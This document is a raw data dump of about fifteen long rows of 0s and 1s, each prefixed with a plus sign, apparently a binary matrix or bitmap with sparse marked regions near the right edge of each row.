+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000001000001000001000000000000000001000000000000000010000000000000000000001000000000100000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000001000000000001001110100110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000010000000000010000000000000000000000000000100000000100000000000010000001001000000000100000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000100000000000000001001001010110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000000000000000000000000000000000000000010000000000000001010000000100000000001010000000001000000001000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000001100000000000000000110110010101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000001100110000000000000000000000000000000000100000000000000000000011111101111010000000000011111111110111101000000000000001011110111111111110000000000001111111111100000000100000000000000011110000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111011100010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100110000000000000000000000000000111111110000000000000000000011110010110110000000000001110111001011011000100000010001101101001111111110000000000001010101111100000000000000010000000011111111111100000000000000000000000000000000000000000000000000000000000000000000000000001111010001101100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000001010101111101010000000000000000110011001111111110000000000001010111001011011001000000001001101101000010110110000000000000000000000000000001000000001000000011110000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101101100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011011101110001000000000000000000111011101111111110000000000001110111110111101000000000000001011110111101111010000000000000000000000000000000000000000000000011110000000000000000000000000000000000000000000000000000000000000000000000000000000000000010101100100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011100101101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111001001110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011010111110001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000110011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101011100000001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101001001100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001010010101110011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111010100100011111111111111111111111111111111111111111111111111 